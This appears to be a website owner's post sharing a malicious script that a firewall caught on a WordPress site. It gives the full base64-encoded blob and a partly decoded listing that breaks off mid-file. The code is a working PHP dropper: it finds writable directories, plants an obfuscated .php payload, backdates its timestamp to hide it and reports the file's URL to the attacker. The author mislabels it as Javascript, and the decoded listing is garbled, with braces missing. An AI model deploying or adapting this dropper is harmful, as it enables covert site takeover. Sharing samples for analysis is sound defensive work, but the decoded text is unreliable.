Intro

This is a Javascript code used to hack wordpress websites. It was used to hack my website.

I do not understand it quite well and my website was not compromised as I was already using a
firewall which captured this hack.

I have put the code in a base 64 decoder and the decoded Javascript code is writtene below

Base 64 coded attack

<pre>eval(base64_decode('aWYoIWRlZmluZWQoIlBIUF9FT0wiKSkKewogICAgZGVmaW5lKCJQSFBfRU
9MIiwgIlxuIik7Cn0KCmlmKCFkZWZpbmVkKCJESVJFQ1RPUllfU0VQQVJBVE9SIikpCnsKICAgIGRlZmluZS
giRElSRUNUT1JZX1NFUEFSQVRPUiIsICIvIik7Cn0KCmZ1bmN0aW9uIGdlbmVyYXRlUmFuZG9tU3RyaW5
nKCRsZW5ndGggPSAxMCkKewogICAgJGNoYXJhY3RlcnMgPSAnMDEyMzQ1Njc4OWFiY2RlZmdoaWpr
bG1ub3BxcnN0dXZ3eHl6JzsKICAgICRjaGFyYWN0ZXJzTGVuZ3RoID0gc3RybGVuKCRjaGFyYWN0ZXJzKT
sKICAgICRyYW5kb21TdHJpbmcgPSAnJzsKICAgIGZvciAoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspI
HsKICAgICAgICAkcmFuZG9tU3RyaW5nIC49ICRjaGFyYWN0ZXJzW3JhbmQoMCwgJGNoYXJhY3RlcnNM
ZW5ndGggLSAxKV07CiAgICB9CiAgICByZXR1cm4gJHJhbmRvbVN0cmluZyAuICIucGhwIjsKfQoKJHBheW
xvYWRfZmlsZSA9ICJQRDl3YUhBTkNnMEtEUXBsZG1Gc0tDSmNibHdrWkdkeVpYVnpaR2tnUFNCcGJuUj
JZV3dvWDE5TVNVNUZYMThwSUNvZ016TTNPeUlwT3cwS0RRb2tZU0E5SUNJM1ZtUnlWQ3RPUjBaUU
1XVnhaamxvYVVOSlkwdDNTRVpxTjBOc1NWRm9Na0prTVZZMllrbDBhRlphUXpGS2J6UnJNbEZUZG5w
U01qWTNOSEpoUmk4NU5IcEVhemM0UjB4UGIzVTFWelpWYnpKTk4xcHNlbm96TTAxdVZITXpTbnA2
WjFSemVWTnNjMkUyTnpSRFNWaHFhRkpQZEZFNU5XWllNWHB2TDFjckwwbGlhRTlPWjJwTlQxTnJjV
Up4VW1KdVptWndkbU5RZFcxaWRFbGxRbWMwUTJaa1drRlJaRTFQZFdnME0wOWtTa3MxTWxGbU0
wdDVVMkZPU1dnMk56UjJjWGhYVWtGNmRrWm5MMWQ0Y1VoQmNFY3pVMnh3VGxvd00ydzFZeT
kyYW5OcVRrTmFUazUzZW01dVJHeG9kMEZpU0RKVlpYbERkbGN4ZWtZdmNsSTBWVFZvT1hwM2NIb
ERaa0p1VkVOb1RVOUVTbFVyYjNSRUswaG9jRWxwVDJzNGNHMUNPSFUwVWs1TU5qYzBhVnBoZW5
CRVJ6ZE5RakpTYzNkT1VqWjVNVkpsYjJSc1drbHpUblpNWVhaMk5qYzBlSGxWZEhWS00wcDFlVmQxU
1hkTmVIcEVTUzl5TVRoa1RqVkNZVUp0TjNKRFptTnVSa2hLT0d4MFJsVk9hMWRFU2xGblUydGFTSFpxS
zNaVGJtNHlLMDA0VDBwek9IWnlhU3RxVWl0bE1sbFpWamNyZGxScU9XTmxaVGwyWW1zMU4ySTJO
VmhhZUdaWWFIWklSRXc1TjJzNVZ5OXVOemswTWsxdEszRkNjMEZhUm05NVkwOUNOamMwT0cxTl
UzQmpMMmhIVTA1WmFuUlRXVGxCWTJ0bVIySkxjMUZaV25Gd2VFdHlTRVkyTnpSMVpYbzFZMWgyT
Xpac1JITkNlVWxoVEZKUFlVOVpSRWRxZDNBelYyZzNiVmxSVW0wcldIZFRWbEpQY25sTFZrNWplVXRrT
DB3MlpYRnNkRmh0YkhOS2VHVmFWbnBNU1RJcmJYSTBNaTlZZHpaYU1EWTRSMUJ2T0dwMlNHUmh
hMWx6YWtSNlYydFJTSGhRUkc5TlFsVXlXVmwxWTJsWVIwMTFMMHhXZGtSSVJuQk9RWEI0ZHpseVE
wZFVOMjg1YTIxVVNIbEdRbEJNV1dneEwzWXhRemR4VjIwMlZubHpOREZqTTJoaGVYVTJkV2xDVEhwa
2FIUnRPRE5tTlRBMVNuSnpVRzFIUW1ST2FVcHhTMEVyTjBFdlJrdERUemRpWmtrM1NGaHRaRVIxVmx
VemVscHVaRE52YkU4NVZHaExTUzl6TmpjME0yTnhWMjFYT1RWWWVEUk1TM2haWkdOelZsTmFWV
0pFZFhWSlpYSTVUbTh4ZFU1NmFsYzBPQzlDUVdSc2NXeDJWalp6VUZJeWFXcGpXa3g1YldOU1J6bE5X
bGN3V0dwSFZESmplalkzTkdGVVYyTm5iV1pFWVVzMGJrRXdSM3BPVGpFNGJHZFJRMjloYm5FdmRYQ
XdURkZxTmpGalJscEpVR2h5VDJ0SmFHRjJaVXBKVjJoaWQwTTRTbVZYTUdOWVIwbDNNMlVyUmpaNF
IyeFJjWEY1YVhSUmJUWXhZVXR1WkVGWVoxTlVZVTFzTmpjMEsydFBaVUUwWlhJclIyRnpaQzlrVFhwU
lJtdE1ibFJWU2padFoyeFBVQzk1YTB4bmFGSlZWV0Z2TWpjNWIyNXdka3RLU1ZKRFJtdEplVEIxTldaUk5
XcExTek5sVG1zeksxcDJkRkpaVlZNeGRIcFNRazlMUkZSV2JrZ3lkbEJuU2s1R2MxQlZNV1JuVm1wUllVZF
pOVU5uUzBJeFFrWjBWVWxYTjNjME5qYzBOVlZITmpjMFRqVnRhV2xvVkVSR1RtRnFWWE5STW5Oc09
HODBablZMZW1Gb1UyMXFaVEk1YzBGMGJuaHJPR2xDWVVwM2NtWm9XV3A0YlVscGRYUnRLMFpyT
mtjeFUzVTNhaXRsTUdKdVl5c3ZMMEZQUjBKWFpuRXlUM0ZUU0hOYU5UZ3lhVmhEV0djclJFSTNhR1k
wWmpSUE9YazJOelEyTnpSMWNtY3ZiMUZSVVM5RVpFeGlUa0puWjNkUWFVaFJTa000U1VoUGEwW
nBRVVJrYUdkQlJ6WTNORUZaWjBKcVFVZFJRVnBSUW0xSVNtRlpWRUZwV2xWblR6WTNORlJCYVZvMk
56UkVTamM1Wm1GWlNVUk9RbHB2VEUxb1JrdHlWM3BaVGtsQmRHdEdjMmR6YTBaclozTjVRbXRS
WTJsRGEwRlZhRWN3Y0hRMFIzcG5ZazlyVEdORVduZE9ia1F5Y1hoTGFFUlROamMwWWxGcU1FazVZa
mRoV2xCdFpqaExjMm94UmxZNVNXbHdZVEpwYlZOSk5Va3haSFYxZVRKRFpEWndaV05tY0cxb1JqYzBl
bE5sU25NeVltRnNjekp6WW1ScldqSkNWa3R5YzBGcFZsSnFaRkYxTm1RMlptNHJkbXMyUVdkaWRrdzF
UR3MxWm5OWmNGUXdZVFkzTkZWV1NqZFVPRzlqUjBSQ1lYVlRiSFIzVFVadU5tUnZOWGt3YVZaSFNs
WmtiMXBXTjNod1Iza3JTVUYyTkRsclNsbHBSbTEyY0daRVVrMWFXVTAyTnpSWmVYWmxWbXg2WVRK
SE5pc3hTR0o2Y3pKM00xTTNXV1ptUVVoVWNscGxZV0p5TTFrNVJISm9TamgyTDNOak1uSkxabU5aTm
tkVmFVaGFUM1V5WjNjek0xRlFSRW95Vm1SWVJHODFVSE5pY0hCc1REY3hTa3h6UkRsSlprMDJOMU4
wUXpZM05HbFFVMFJzVUZwT1duWmlaak12UjJGVFRWSTBVVmM1TTBKYWFpdEVNVzFhYTBSa1ltW
WlPdzBLSkdFZ1BTQnpkSEpmY21Wd2JHRmpaU2drWkdkeVpYVnpaR2tzSUNKRklpd2dKR0VwT3cwS1p
YWmhiQ0FvWjNwcGJtWnNZWFJsS0dKaGMyVTJORjlrWldOdlpHVW9KR0VwS1NrNyI7CiRwYXlsb2FkX
25hbWUgPSAiIjsKCnNyYW5kKHRpbWUoKSk7CgovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8KZnVuY3Rpb24gY29tcGFyZXIoJGEsICRiKQp7CiAgICByZXR1cm4gc3
RybGVuKCRhKS1zdHJsZW4oJGIpOwp9CgppZiAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9wdXRfY29u
dGVudHMnKSkgewogICAgZnVuY3Rpb24gZmlsZV9wdXRfY29udGVudHMoJGZpbGVuYW1lLCAkZGF0Y
SkgewogICAgICAgICRmID0gQGZvcGVuKCRmaWxlbmFtZSwgJ3cnKTsKICAgICAgICBpZiAoISRmKSB7CiA
gICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAkYnl0ZXMgPSB
md3JpdGUoJGYsICRkYXRhKTsKICAgICAgICAgICAgZmNsb3NlKCRmKTsKICAgICAgICAgICAgcmV0dXJuIC
RieXRlczsKICAgICAgICB9CiAgICB9Cn0KCmZ1bmN0aW9uIEdldFBhdGhEaWZmKCRiYXNlX3BhdGgsICRm
dWxsX3BhdGgpCnsKICAgICRwb3MgPSBzdHJwb3MoJGZ1bGxfcGF0aCwgJGJhc2VfcGF0aCk7CgogICAg
aWYgKCRwb3MgPT09IEZBTFNFKQogICAgewogICAgICAgIHJldHVybiBGQUxTRTsKICAgIH0KCiAgICByZX
R1cm4gc3Vic3RyKCRmdWxsX3BhdGgsICRwb3MgKyBzdHJsZW4oJGJhc2VfcGF0aCkpOwp9CgpmdW5j
dGlvbiBHZXRXcml0YWJsZURpcnMoKQp7CiAgICAkcmVzID0gQXJyYXkoKTsKCiAgICAkYW5hbHlzeXNfcX
VldWUgPSBBcnJheSgpOwoKICAgICRhbmFseXN5c19xdWV1ZVtdID0gR2V0RG9jUm9vdCgpOwoKICAgI
CRzZWxmX3BhdGggPSAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107CiAgICB3aGlsZSAoKCRzbGFzaC
A9IHN0cnJwb3MoJHNlbGZfcGF0aCwgRElSRUNUT1JZX1NFUEFSQVRPUikpICE9PSBGQUxTRSkKICAgIHs
KICAgICAgICAkc2VsZl9wYXRoID0gc3Vic3RyKCRzZWxmX3BhdGgsIDAsICRzbGFzaCk7CgogICAgICAgIGl
mICgkc2VsZl9wYXRoID09IEdldERvY1Jvb3QoKSkKICAgICAgICB7CiAgICAgICAgICAgIGJyZWFrOwogICAgI
CAgIH0KCiAgICAgICAgaWYgKHN0cmxlbigkc2VsZl9wYXRoKSkKICAgICAgICB7CiAgICAgICAgICAgICRhbm
FseXN5c19xdWV1ZVtdID0gJHNlbGZfcGF0aDsKICAgICAgICB9CiAgICB9CgogICAgZm9yZWFjaCAoJGFuY
Wx5c3lzX3F1ZXVlIGFzICRjdXJyZW50X2RpcikKICAgIHsKICAgICAgICBpZiAoIWluX2FycmF5KCRjdXJyZW5
0X2RpciwgJHJlcykpCiAgICAgICAgewogICAgICAgICAgICAkcmVzID0gYXJyYXlfbWVyZ2UoJHJlcywgR2V0R
GlyZWN0b3J5TGlzdCgkY3VycmVudF9kaXIpKTsKICAgICAgICB9CiAgICB9CiAgICAkcmVzID0gYXJyYXlfbW
VyZ2UoJGFuYWx5c3lzX3F1ZXVlLCAkcmVzKTsKCiAgICByZXR1cm4gQ2hlY2tXcml0YWJsZShhcnJheV91b
mlxdWUoJHJlcykpOwp9CgpmdW5jdGlvbiBDaGVja1dyaXRhYmxlKCRkaXJfbGlzdCkKewogICAgJGRpcl9
saXN0X3dyaXRhYmxlID0gQXJyYXkoKTsKCiAgICBmb3JlYWNoICgkZGlyX2xpc3QgYXMgJGRpcikKICAgIHs
KICAgICAgICBpZiAoQGlzX3dyaXRhYmxlKCRkaXIpID09IFRSVUUpCiAgICAgICAgewogICAgICAgICAgICAk
ZGlyX2xpc3Rfd3JpdGFibGVbXSA9ICRkaXI7CiAgICAgICAgfQogICAgfQoKICAgIHJldHVybiAkZGlyX2xpc3R
fd3JpdGFibGU7Cn0KCmZ1bmN0aW9uIEdldERpcmVjdG9yeUxpc3QoJGRpciwgJGRlcHRoPTEwMDApC
nsKCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsKICAgICRkaXJfY291bnQgPSAwOwoKICAgIGlmICgkZGVwdGg
gPT0gMCkKICAgIHsKICAgICAgICByZXR1cm4gJHJlc3VsdDsKICAgIH0KCiAgICAkZGlyID0gc3RybGVuKCRk
aXIpID09IDEgPyAkZGlyIDogcnRyaW0oJGRpciwgJ1xcLycpOwogICAgJGggPSBAb3BlbmRpcigkZGlyKTsKI
CAgIGlmICgkaCA9PT0gRkFMU0UpCiAgICB7CiAgICAgICAgcmV0dXJuICRyZXN1bHQ7CiAgICB9CgogICAg
d2hpbGUgKCgkZiA9IHJlYWRkaXIoJGgpKSAhPT0gRkFMU0UpCiAgICB7CiAgICAgICAgaWYgKCRmICE9PS
AnLicgYW5kICRmICE9PSAnLi4nKQogICAgICAgIHsKICAgICAgICAgICAgJGN1cnJlbnRfZGlyID0gIiRkaXIvJG
YiOwogICAgICAgICAgICBpZiAoaXNfZGlyKCRjdXJyZW50X2RpcikpCiAgICAgICAgICAgIHsKICAgICAgICAgI
CAgICAgICRkaXJfY291bnQgKz0gMTsKCiAgICAgICAgICAgICAgICBpZiAoJGRpcl9jb3VudCA+PSAkZGVwd
GgpCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICB9C
gogICAgICAgICAgICAgICAgJHJlc3VsdFtdID0gJGN1cnJlbnRfZGlyOwogICAgICAgICAgICAgICAgJHJlc3VsdC
A9IGFycmF5X21lcmdlKCRyZXN1bHQsIEdldERpcmVjdG9yeUxpc3QoJGN1cnJlbnRfZGlyLCAkZGVwdGgg
LyAxMCkpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQoKICAgIGNsb3NlZGlyKCRoKTsKCiAgICByZ
XR1cm4gJHJlc3VsdDsKfQoKZnVuY3Rpb24gR2V0RG9jUm9vdCgpCnsKICAgICRkb2Nyb290X2VuZCA9IH
N0cnJwb3MoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddLCAkX1NFUlZFUlsnUkVRVUVTVF9VUkknX
Sk7CiAgICBpZiAoJGRvY3Jvb3RfZW5kID09PSBGQUxTRSkKICAgIHsKICAgICAgICByZXR1cm4gJF9TRVJWR
VJbJ0RPQ1VNRU5UX1JPT1QnXTsKICAgIH0KICAgIGVsc2VpZiAoJGRvY3Jvb3RfZW5kID09PSAwKQogICA
gewogICAgICAgIHJldHVybiAiLyI7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAgICAgcmV0dXJuIHN1YnN0cig
kX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDAsICRkb2Nyb290X2VuZCk7CiAgICB9Cn0KCmZ1bmN
0aW9uIEdldFBheWxvYWQoJHBheWxvYWQpCnsKICAgICRjdXJyZW50X3BheWxvYWQgPSBiYXNlNjRfZ
GVjb2RlKCRwYXlsb2FkKTsKCiAgICByZXR1cm4gJGN1cnJlbnRfcGF5bG9hZDsKfQoKZnVuY3Rpb24gV3Jp
dGVQYXlsb2FkKCRwYXRoLCAkcGF5bG9hZCkKewogICAgaWYgKCFmaWxlX2V4aXN0cygkcGF0aCkpCiA
gICB7CiAgICAgICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCBHZXRQYXlsb2FkKCRwYXlsb2Fk
KSkgIT0gRkFMU0UpCiAgICAgICAgewogICAgICAgICAgICByZXR1cm4gVFJVRTsKICAgICAgICB9CgogICAgf
QoKICAgIHJldHVybiBGQUxTRTsKfQoKLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8KCiMgZ2V0IGJhc2UgbG9j
YWwgYW5kIHJlbW90ZSBwYXRoCiRiYXNlX3d3d19wYXRoID0gJGhvc3QgPSBAJF9TRVJWRVJbJ0hUVFBf
SE9TVCddOwokYmFzZV9sb2NhbF9wYXRoID0gR2V0RG9jUm9vdCgpOwoKaWYgKCEoJGJhc2VfbG9jY
WxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcGF0aC4iLy5odGFjY2VzcyIpKSkKewogICAgaWY
gKCEoJGJhc2VfbG9jYWxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcGF0aC4iL2luZGV4LnBocC
IpKSkKICAgIHsKICAgICAgICBpZiAoISgkYmFzZV9sb2NhbF9wYXRoX3RpbWUgPSBAc3RhdCgkYmFzZV9s
b2NhbF9wYXRoLiIvaW5kZXguaHRtbCIpKSkKICAgICAgICB7CiAgICAgICAgICAgIGlmICghKCRiYXNlX2xvY
2FsX3BhdGhfdGltZSA9IEBzdGF0KCRiYXNlX2xvY2FsX3BhdGguIi8uLiIpKSkKICAgICAgICAgICAgewogICAg
ICAgICAgICAgICAgaWYgKCEoJGJhc2VfbG9jYWxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcG
F0aCkpKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICRiYXNlX2xvY2FsX3BhdGhfdGltZ
SA9IEFycmF5KCk7CiAgICAgICAgICAgICAgICAgICAgJGJhc2VfbG9jYWxfcGF0aF90aW1lWydtdGltZSddID
0gdGltZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQp9CgokYmFz
ZV9sb2NhbF9wYXRoX3RpbWUgPSAkYmFzZV9sb2NhbF9wYXRoX3RpbWVbJ210aW1lJ107CgokZGlyX2
xpc3Rfd3JpdGFibGUgPSBHZXRXcml0YWJsZURpcnMoKTsKCmlmIChjb3VudCgkZGlyX2xpc3Rfd3JpdGFi
bGUpID09IDApCnsKICAgIGVjaG8gIlVSTCNTVEFUVVNfVU5XUklUQUJMRSI7CiAgICBleGl0KCk7Cn0KCn
Vzb3J0KCRkaXJfbGlzdF93cml0YWJsZSwgJ2NvbXBhcmVyJyk7ICMgc29ydCBkaXJlY3RvcnkgYnkgbGVuC
gokbGlzdF93cml0YWJsZSA9IEFycmF5KCk7CiRsaXN0X3dyaXRhYmxlW10gPSAkZGlyX2xpc3Rfd3JpdGFi
bGVbMF07CiRsaXN0X3dyaXRhYmxlW10gPSAkZGlyX2xpc3Rfd3JpdGFibGVbcmFuZCgwLHNpemVvZigk
ZGlyX2xpc3Rfd3JpdGFibGUpKV07CiRnb29kID0gRkFMU0U7CiRnb29kX2NvdW50ZXIgPSAwOwojIHRye
SB0byB1cGxvYWQKJG1heF90cnllcyA9IHN0cmxlbigkcGF5bG9hZF9uYW1lKSA9PSAwID8gNSA6IDE7Cm
ZvcmVhY2ggKCRsaXN0X3dyaXRhYmxlIGFzICRjdXJyZW50X2RpcikKewogICAgLy8gaWYgcGF5bG9hZCB
uYW1lIGlzIHNldCwgbm8gbW9yZSBvbmUgdHJ5IHRvIHVwbG9hZCBvbiBjdXJyZW50IGRpcgogICAgLy9m
b3IgKCRpPTA7ICRpIDwgJG1heF90cnllczsgJGkrKykKICAgIHsKICAgICAgICBpZiAoc3RybGVuKCRwYXlsb2
FkX25hbWUpID09IDApCiAgICAgICAgewogICAgICAgICAgICAkdGVtcF9wYXlsb2FkX25hbWUgPSBnZW5l
cmF0ZVJhbmRvbVN0cmluZygpOwogICAgICAgIH0KICAgICAgICBlbHNlCiAgICAgICAgewogICAgICAgICAg
ICAkdGVtcF9wYXlsb2FkX25hbWUgPSAkcGF5bG9hZF9uYW1lOwogICAgICAgIH0KCiAgICAgICAgJGZ1bG
xfcGF5bG9hZF9uYW1lID0gJGN1cnJlbnRfZGlyIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICR0ZW1wX3Bh
eWxvYWRfbmFtZTsKCiAgICAgICAgJHVyaV9wYXRoID0gR2V0UGF0aERpZmYoJGJhc2VfbG9jYWxfcGF0a
CwgJGZ1bGxfcGF5bG9hZF9uYW1lKTsKICAgICAgICBpZiAoc3RycG9zKCR1cmlfcGF0aCwgJHRlbXBfcGF5
bG9hZF9uYW1lKSA9PT0gZmFsc2UpCiAgICAgICAgewogICAgICAgICAgICAkdXJpX3BhdGggPSAkdXJpX3
BhdGggLiAiLyIgIC4gJHRlbXBfcGF5bG9hZF9uYW1lOwogICAgICAgIH0KICAgICAgICAkZnVsbF91cmkgPSA
kYmFzZV93d3dfcGF0aCAuIChzdHJwb3MoJHVyaV9wYXRoLCAiLyIpID09IDAgPyAkdXJpX3BhdGggOiAiL
yIuJHVyaV9wYXRoKTsKCiAgICAgICAgaWYgKFdyaXRlUGF5bG9hZCgkZnVsbF9wYXlsb2FkX25hbWUsICR
wYXlsb2FkX2ZpbGUpKQogICAgICAgIHsKICAgICAgICAgICAgdG91Y2goJGZ1bGxfcGF5bG9hZF9uYW1lLC
AkYmFzZV9sb2NhbF9wYXRoX3RpbWUpOyAvLyBzZXQgbGFzdCBtb2RpZmljYXRpb24gdGltZSBhcyByb2
90IGZvbGRlcgogICAgICAgICAgICBjaG1vZCgkZnVsbF9wYXlsb2FkX25hbWUsIDA3NTUpOwogICAgICAgIC
AgICBlY2hvICJVUkwjaHR0cDovLyIgLiAkZnVsbF91cmkgLiBQSFBfRU9MOwogICAgICAgICAgICAkZ29vZD
1UUlVFOwogICAgICAgICAgICAkZ29vZF9jb3VudGVyKys7CiAgICAgICAgICAgIGlmICgkZ29vZF9jb3VudGV
yID4xKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAvL3VubGluaygiZGZhb25mcGZrd2cucGhwIik7C
iAgICAgICAgICAgICAgICBlY2hvICIjQ0NDVVJMIjsKICAgICAgICAgICAgICAgIGV4aXQoKTsKICAgICAgICAgI
CAgfQogICAgICAgIH0KICAgIH0KfQppZighJGdvb2QpCiAgICBlY2hvICJVUkwjU1RBVFVTX0NBTlRVUExPQ
UQjQ0NDVVJMIjsKZWNobyAiI0NDQ1VSTCI7Ci8vdW5saW5rKCJkZmFvbmZwZmt3Zy5waHAiKTsKZXhp
dCgpOw=='));</pre>

Outout when I out it through an online base 64 decoder

if(!defined("PHP_EOL"))

define("PHP_EOL", "\n");

if(!defined("DIRECTORY_SEPARATOR"))

define("DIRECTORY_SEPARATOR", "/");

function generateRandomString($length = 10)

$characters = '0123456789abcdefghijklmnopqrstuvwxyz';

$charactersLength = strlen($characters);

$randomString = '';

for ($i = 0; $i < $length; $i++) {

$randomString .= $characters[rand(0, $charactersLength - 1)];

}
 return $randomString . ".php";

$payload_file =
"PD9waHANCg0KDQpldmFsKCJcblwkZGdyZXVzZGkgPSBpbnR2YWwoX19MSU5FX18pICogMzM3OyIp
Ow0KDQokYSA9ICI3VmRyVCtOR0ZQMWVxZjloaUNJY0t3SEZqN0NsSVFoMkJkMVY2Ykl0aFZaQzFKbzR
rMlFTdnpSMjY3NHJhRi85NHpEazc4R0xPb3U1VzZVbzJNN1psenozM01uVHMzSnp6Z1RzeVNsc2E2NzR
DSVhqaFJPdFE5NWZYMXpvL1crL0liaE9OZ2pNT1NrcUJxUmJuZmZwdmNQdW1idEllQmc0Q2ZkWkFRZ
E1PdWg0M09kSks1MlFmM0t5U2FOSWg2NzR2cXhXUkF6dkZnL1d4cUhBcEczU2xwTlowM2w1Yy92an
NqTkNaTk53em5uRGxod0FiSDJVZXlDdlcxekYvclI0VTVoOXp3cHlDZkJuVENoTU9ESlUrb3REK0hocElpT2
s4cG1COHU0Uk5MNjc0aVphenBERzdNQjJSc3dOUjZ5MVJlb2RsWklzTnZMYXZ2Njc0eHlVdHVKM0p1e
Vd1SXdNeHpESS9yMThkTjVCYUJtN3JDZmNuRkhKOGx0RlVOa1dESlFnU2taSHZqK3ZTbm4yK004T0pz
OHZyaStqUitlMllZVjcrdlRqOWNlZTl2Yms1N2I2NVhaeGZYaHZIREw5N2s5Vy9uNzk0Mk1tK3FCc0FaRm
95Y09CNjc0OG1NU3BjL2hHU05ZanRTWTlBY2tmR2JLc1FZWnFweEtySEY2NzR1ZXo1Y1h2MzZsRHNCe
UlhTFJPYU9ZREdqd3AzV2g3bVlRUm0rWHdTVlJPcnlLVk5jeUtkL0w2ZXFsdFhtbHNKeGVaVnpMSTIrbXI
0Mi9YdzZaMDY4R1BvOGp2SGRha1lzakR6V2tRSHhQRG9NQlUyWVl1Y2lYR011L0xWdkRIRnBOQXB4dz
lyQ0dUN285a21USHlGQlBMWWgxL3YxQzdxV202VnlzNDFjM2hheXU2dWlCTHpkaHRtODNmNTA1SnJ
zUG1HQmROaUpxS0ErN0EvRktDTzdiZkk3SFhtZER1VlUzelpuZDNvbE85VGhLSS9zNjc0M2NxV21XOTV
YeDRMS3hZZGNzVlNaVWJEdXVJZXI5Tm8xdU56alc0OC9CQWRscWx2VjZzUFIyaWpjWkx5bWNSRzlN
WlcwWGpHVDJjejY3NGFUV2NnbWZEYUs0bkEwR3pOTjE4bGdRQ29hbnEvdXAwTFFqNjFjRlpJUGhyT2
tJaGF2ZUpJV2hid0M4SmVXMGNYR0l3M2UrRjZ4R2xRcXF5aXRRbTYxYUtuZEFYZ1NUYU1sNjc0K2tPZU
E0ZXIrR2FzZC9kTXpRRmtMblRVSjZtZ2xPUC95a0xnaFJVVWFvMjc5b25wdktKSVJDRmtJeTB1NWZRNW
pLSzNlTmszK1p2dFJZVVMxdHpSQk9LRFRWbkgydlBnSk5Gc1BVMWRnVmpRYUdZNUNnS0IxQkZ0VUlX
N3c0Njc0NVVHNjc0TjVtaWloVERGTmFqVXNRMnNsOG80ZnVLemFoU21qZTI5c0F0bnhrOGlCYUp3cm
ZoWWp4bUlpdXRtK0ZrNkcxU3U3aitlMGJuYysvL0FPR0JXZnEyT3FTSHNaNTgyaVhDWGcrREI3aGY0ZjR
POXk2NzQ2NzR1cmcvb1FRUS9EZExiTkJnZ3dQaUhRSkM4SUhPa0ZpQURkaGdBRzY3NEFZZ0JqQUdRQ
VpRQm1ISmFZVEFpWlVnTzY3NFRBaVo2NzRESjc5ZmFZSUROQlpvTE1oRktyV3pZTklBdGtGc2dza0ZrZ3
N5QmtRY2lDa0FVaEcwcHQ0R3pnYk9rTGNEWndObkQycXhLaERTNjc0YlFqMEk5YjdhWlBtZjhLc2oxRlY
5SWlwYTJpbVNJNUkxZHV1eTJDZDZwZWNmcG1oRjc0elNlSnMyYmFsczJzYmRrWjJCVktyc0FpVlJqZFF1
NmQ2Zm4rdms2QWdidkw1TGs1ZnNZcFQwYTY3NFVWSjdUOG9jR0RCYXVTbHR3TUZuNmRvNXkwaV
ZHSlZkb1pWN3hwR3krSUF2NDlrSllpRm12cGZEUk1aWU02NzRZeXZlVmx6YTJHNisxSGJ6czJ3M1M3W
WZmQUhUclplYWJyM1k5RHJoSjh2L3NjMnJLZmNZNkdVaUhaT3UyZ3czM1FQREoyVmRYRG81UHNic
HBsTDcxSkxzRDlJZk02N1N0QzY3NGlQU0RsUFpOWnZiZjMvR2FTTVI0UVc5M0JaaitEMW1aa0RkYmYiO
w0KJGEgPSBzdHJfcmVwbGFjZSgkZGdyZXVzZGksICJFIiwgJGEpOw0KZXZhbCAoZ3ppbmZsYXRlKGJhc2U
2NF9kZWNvZGUoJGEpKSk7";

$payload_name = "";

srand(time());

/////////////////////////////////////////////////////////

function comparer($a, $b)

{
 return strlen($a)-strlen($b);

if (!function_exists('file_put_contents')) {

function file_put_contents($filename, $data) {

$f = @fopen($filename, 'w');

if (!$f) {

return false;

} else {

$bytes = fwrite($f, $data);

fclose($f);

return $bytes;

function GetPathDiff($base_path, $full_path)

$pos = strpos($full_path, $base_path);

if ($pos === FALSE)

return FALSE;

return substr($full_path, $pos + strlen($base_path));

function GetWritableDirs()

$res = Array();
$analysys_queue = Array();

$analysys_queue[] = GetDocRoot();

$self_path = $_SERVER['SCRIPT_FILENAME'];

while (($slash = strrpos($self_path, DIRECTORY_SEPARATOR)) !== FALSE)

$self_path = substr($self_path, 0, $slash);

if ($self_path == GetDocRoot())

break;

if (strlen($self_path))

$analysys_queue[] = $self_path;

foreach ($analysys_queue as $current_dir)

if (!in_array($current_dir, $res))

$res = array_merge($res, GetDirectoryList($current_dir));

$res = array_merge($analysys_queue, $res);

return CheckWritable(array_unique($res));
}

function CheckWritable($dir_list)

$dir_list_writable = Array();

foreach ($dir_list as $dir)

if (@is_writable($dir) == TRUE)

$dir_list_writable[] = $dir;

return $dir_list_writable;

function GetDirectoryList($dir, $depth=1000)

$result = array();

$dir_count = 0;

if ($depth == 0)

return $result;

$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');

$h = @opendir($dir);

if ($h === FALSE)

 {

return $result;

while (($f = readdir($h)) !== FALSE)

if ($f !== '.' and $f !== '..')

$current_dir = "$dir/$f";

if (is_dir($current_dir))

$dir_count += 1;

if ($dir_count >= $depth)

break;

$result[] = $current_dir;

$result = array_merge($result, GetDirectoryList($current_dir, $depth / 10));

closedir($h);

return $result;

function GetDocRoot()

{
 $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);

if ($docroot_end === FALSE)

return $_SERVER['DOCUMENT_ROOT'];

elseif ($docroot_end === 0)

return "/";

else

return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);

function GetPayload($payload)

$current_payload = base64_decode($payload);

return $current_payload;

function WritePayload($path, $payload)

if (!file_exists($path))

if (file_put_contents($path, GetPayload($payload)) != FALSE)

return TRUE;

}
 }

return FALSE;

////////////////////////////////////////////////////////////////////////////////////////////

# get base local and remote path

$base_www_path = $host = @$_SERVER['HTTP_HOST'];

$base_local_path = GetDocRoot();

if (!($base_local_path_time = @stat($base_local_path."/.htaccess")))

